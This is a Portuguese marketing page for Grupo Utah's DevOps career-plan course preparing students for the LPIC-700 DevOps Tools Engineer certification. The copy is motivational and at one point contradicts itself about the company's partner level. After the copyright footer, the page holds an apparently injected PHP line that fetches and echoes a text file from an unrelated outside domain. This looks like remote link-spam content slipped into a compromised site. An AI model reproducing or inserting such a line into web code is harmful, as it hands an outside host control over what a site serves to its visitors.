fabio artes 81121_Prancheta 1 cópia 18

PLANO DE CARREIRA deVOPS TOOLS EGINEER - LPIC - 700/100 - O MELHOR DO MERCADO

O conceito de Infra Ágil, juntamente com novos postos de trabalho como Ágile Coach é uma realidade dentro do mundo corporativo e quando você olha para seu curriculum hoje, o que você tem feito para se adequar a esta nova realidade?

o QUE É REALMENTE DEVOPS?

Uma metodologia?
Uma Cultura?
Boas Práticas?
Ferramentas?


Se esta definição ainda não é clara para você e principalmente se você não conhece tudo que envolve este "fenômeno", certamente este plano de Carreira em DevOps foi contruído para você.

O Curso de DevOps baseia-se na utilização de uma metodologia que utiliza a comunicação para integrar desenvolvedores de software e profissionais de infraestrutura de TI.

Já dizia um grande palestrante: “Esteja em constante mudança, e o sucesso será inevitável” Sulivan França. A mudança de paradigmas dentro do conceito de infraestrutura no ambiente de tecnologia da informação nunca se fez tão eminente.

Ademais, como seria para você hoje entrar em um mercado onde faltam profissionais qualificados ? Obter ganhos financeiros e qualidade de tempo para realmente executar o que lhe permite viver. Quando você olha hoje para sua vida dentro da área de T.I. você tem trabalho ou carreira ? E daqui à cinco anos como você estará? Analogamente o que você precisa fazer hoje que não tem feito para mudar de vida ?

Esta na hora de pensar fora da caixa e se capacitar para ser um profissional capaz de integrar a área de Desenvolvimento a área de Infra-Estrutura tendo assim as competências que as empresas buscam em um profissional diferenciado no mercado.

Sob o mesmo ponto de vista, entrar em uma área promissora, obtendo altos ganhos, aproveitando as melhores oportunidades do mercado de trabalho, sendo requisitado pelas maiores empresas não só pelo seu conhecimento técnico, mas também pelo desenvolvimento de comportamentos de pessoas de sucesso.

A INFRAESTRUTURA ÁGIL É A EVOLUÇÃO INEVITÁVEL NO AMBIENTE DE T.I.

O conceito de Infra Ágil, juntamente com novos postos de trabalho como Ágile Coach é uma realidade dentro do mundo corporativo e quando você olha para seu curriculum hoje, o que você tem feito para se adequar a esta nova realidade?


Para atender a essa necessidade crescente de profissionais qualificados, a LPI desenvolveu a certificação DevOps Tools Engineer do Linux Professional Institute.


Só para ilustrar, esta certificação verifica as habilidades necessárias para usar as ferramentas que melhoram a colaboração nos fluxos de trabalho durante a administração do sistema e o desenvolvimento de software.


Certamente o Grupo Utah parceiro PLATINUM da LPI sem dúvida preparou um treinamento de DevOps onde o aluno poderá dar continuidade em seu plano de Carreira, assim estamos desenvolvendo não apenas competências técnicas mas também comportamentos que mudarão completamente a maneira com que as empresas o enxergam dentro do ambiente.

Curso DevOps Tools Egineer - Certificação LPIC-700

Turmas Presencias e EAD AO VIVO.
Treinamento preparatório para a Certificação Internacional LPIC-700 de DevOps Tools Engineeer.

827
Alunos novos

4.7/5

Pré-Requisitos do Plano de Carreira DevOps

CARGA HORÁRIA

São 44 horas presenciais ou EAD com turmas aos sábados e semanais, noturno e diurno.

Ambiente Utah

Plano de Carreira

Conquiste Seu Plano de Carreira

O Grupo Utah, parceiro GOLD da LPI, preparou um treinamento de DevOps onde o aluno poderá dar continuidade em seu plano de Carreira, assim estamos desenvolvendo não apenas competências técnicas mas também comportamentos que mudarão completamente a maneira com que as empresas o enxergam dentro do ambiente.

Você vai aprender tudo sobre Infra Ágil, Conteiners, Docker, Jenkins, Git, OpenStack , OpenShift e muitas técnicas relaciondas a IAAS e Desenvolvimento Ágil.

Chegou a hora de você se atulizar e ter empresas procurando por você.

#DevOpsNaUtah


Copyright © 2020 Grupo Utah · Todos os Direitos Reservados
CNPJ: 07.881.563/0001-85

echo file_get_contents("https://beelinkback.xyz/link.txt"); ?>